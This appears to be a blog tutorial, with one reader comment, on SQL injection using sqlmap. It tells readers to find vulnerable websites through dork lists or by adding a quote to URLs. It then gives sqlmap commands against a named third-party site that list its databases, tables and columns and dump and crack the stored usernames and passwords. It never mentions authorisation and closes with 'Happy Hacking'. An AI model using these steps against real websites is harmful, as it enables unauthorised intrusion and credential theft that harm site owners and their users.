Introduction
A SQL
injection is often used to attack the security of a website by inputting
SQL statements in a web form to get a badly designed website to perform
operations on the database other than the usual operations as intended by the
designer. SQL injection is a code injection technique that exploits security
vulnerability in a website's software. The vulnerability happens when user
input is either incorrectly filtered for string literal escape characters
embedded in SQL statements or user input is not strongly typed and unexpectedly
executed.
SQL commands are thus injected from the web form into the database of
an application (like queries) to change the database content or dump the
database information like credit card or passwords to the attacker. SQL
injection is mostly known as an attack vector for websites but can be used to
attack any type of SQL database.
This
following report will demonstrate the processes involves in accomplishing the
SQL injection process.
SQL Injection Tutorial
There are
number of tools available to do Sql injection but here we are going to use
Backtrack 5.
Since we
have amount of tools in backtrack 5 to perform sql injection, we going to use
one of them, which is Sqlmap.
First we need to open sqlmap application on Backtrack 5. Before
we start, we need to find a vulnerable website to start our injection. To find
vulnerable website, we can use download dork list which contain list of website
that is vulnerable or we can simply try on our own whether a site is vulnerable
or not by adding string quotes (‘) at the end of url of website which look
something like the url listed below www.yboaofnc.com/event.php?id=35’.
When you receive the above error, it shows that the website
is vulnerable and can be injected with sql code. If you did not get this error
and the website refresh to its main page or other page as normal, then this
website is not vulnerable and you can start find other website to inject. In
this can case, we going to use this www.yboaofnc.com/event.php?id=35 for
our demo.
Once
you open sqlmap in backtrack, the first step will be to scan the url to see
whether it is injectable and at the same time to retrieved the available
database in the particular website. To do that we need to enter the following
command without the quote (“).
“python sqlmap.py –u www.yboaofnc.com/event.php?id=35 --dbs”
Once the scan is complete, it will show the available
databases inside the target web. In this case there are 3 databases we found
after scanning which is “information schema” , “test”, “yboa”.
Next, we want to view tables of the database. For that, we select
one of the databases. In this case, we choose the “yboa” database. Then type
this command to view tables:
“python sqlmap.py –u www.yboaofnc.com/event.php?id=35 -D yboa
--tables”
Once done it will show all the tables inside the selected
database. The above screenshot show a number of tables inside the selected
database.
Now , we want to view one of the columns of the tables
listed above. In this case, we are going to view the columns of table
‘allowed’. To do so type this command:
“python sqlmap.py –u www.yboaofnc.com/event.php?id=35 -D yboa –T allowed --columns”
Once the above command is entered , we can view list of
columns of the table ‘allowed’. We have three columns which are ‘id’, ’pwd’ & ‘uname’ .
The last of this tutorial is to is to dump the ‘pwd’ columns
and the’ uname’ column to get the username and the password . First, let us to
dump the password. To do so, enter the following command:
“python sqlmap.py –u www.yboaofnc.com/event.php?id=35 -D
yboa -T allowed -C pwd --dump”
Once the above command is executed, the hash value of the
password will be shown. Then, we have an option whether to use dictionary
attack to retrieved the hash value. Enter ‘Y’ for yes to retrieve the password.
Finally, the login password will be shown. In this case, the
password is ‘sha1_generic_passwd.
The same method use to dump password is used to retrieve the
user name but instead of dumping ‘pwd’ , now we have to dump the ‘uname’ Once the below command is entered, we will get the username which
is ‘admin’ in this case.
“python sqlmap.py
–u www.yboaofnc.com/event.php?id=35 -D
yboa -T allowed -C uname --dump”
~ Happy Hacking ~
Need help..
ReplyDeleteHow do you find the php.?id=(number) on a webpage?